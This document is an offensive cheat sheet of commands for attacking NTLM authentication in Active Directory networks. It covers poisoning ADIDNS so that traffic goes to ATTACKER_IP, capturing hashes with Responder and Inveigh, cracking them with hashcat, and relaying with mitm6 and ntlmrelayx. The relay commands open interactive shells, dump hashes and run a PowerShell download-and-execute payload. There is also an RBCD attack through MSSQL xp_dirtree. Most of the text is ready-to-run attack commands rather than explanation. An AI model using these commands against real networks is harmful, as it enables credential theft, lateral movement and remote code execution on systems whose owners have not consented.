Hash | Hashcat | Attack method |
LM | 3000 | crack/pass the hash |
NTLM/NTHash | 1000 | crack/pass the hash |
NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
Abusing ADIDNS to Send traffic to the target
#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose
#assign permissions to the ADIDNS PowershellGrant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
Capturing Hashes using responder and cracking hashes
#Find the interface of the IP (see via route table) ip route get #start responder
sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat
hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force
Mitm6 & NTLMRelayx #start MITM6 and assign IPV6 DNS Address to hosts mitm6 -d victim.domain #start ntmrelay ntlmrelayx.py -wh Attacker_IP -t smb://VICTIM_IP/ -i
NTLM relay of ADWS (WCF) connections
This attack works only when a connection is initiated from the target machine.
ntlmrelayx.py --no-smb-server --no-http-server -t rpc://TARGET_IP-c "echo a > c:\test"
#Simulate the vuln
get-aduser -filter * -server <pentester_machine>
#Capture and view the traffic in wireshark
socat TCP-LISTEN:9389,fork,reuseaddr TCP:DC_IP:9389
Relaying using ntlmrelayx
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory
# -c: execute the command
# -e: execute a binary
ntlmrelayx can automatically dump hashes, when it can access an administrator account.
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.
sudo proxychains ntlmrelayx.py -t smb:// -smb2support
Useful commands
sudo proxychains ntlmrelayx.py -t smb:// -smb2support
sudo proxychains ntlmrelayx.py -t smb:// -l loot -i -smb2support -c "powershell.exe -c iex(new-object system.net.webclient).downloadstring('')"
#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://USERNAME@ -smb2support
Inveigh does not support SMB-auth, so prefer ntlmrelayx
Import-Module .\Inveigh.ps1
#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo
#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSCredential $Cred -ADIDNSDomain
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController
#Capturing Hashes on the target
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target -ShowHelp N -StatusOutput N -Command "powershell.exe -c whoami"
Resource based Constraint Delegation Attack on MSSQL Server
More Info Here
#add a DNS entry to attacker machine
Invoke-DNSUpdate -DNSType A -DNSName shit -DNSData
#run the command on sql server which has xp_dirtree stored procedure
SQLCMD -S SERVER\username -Q "exec master.dbo.xp_dirtree '\\shit\a'" -U Admin -P password
proxychains python rbcd_relay.py SQLServer_IP steins.local server$ Other_User
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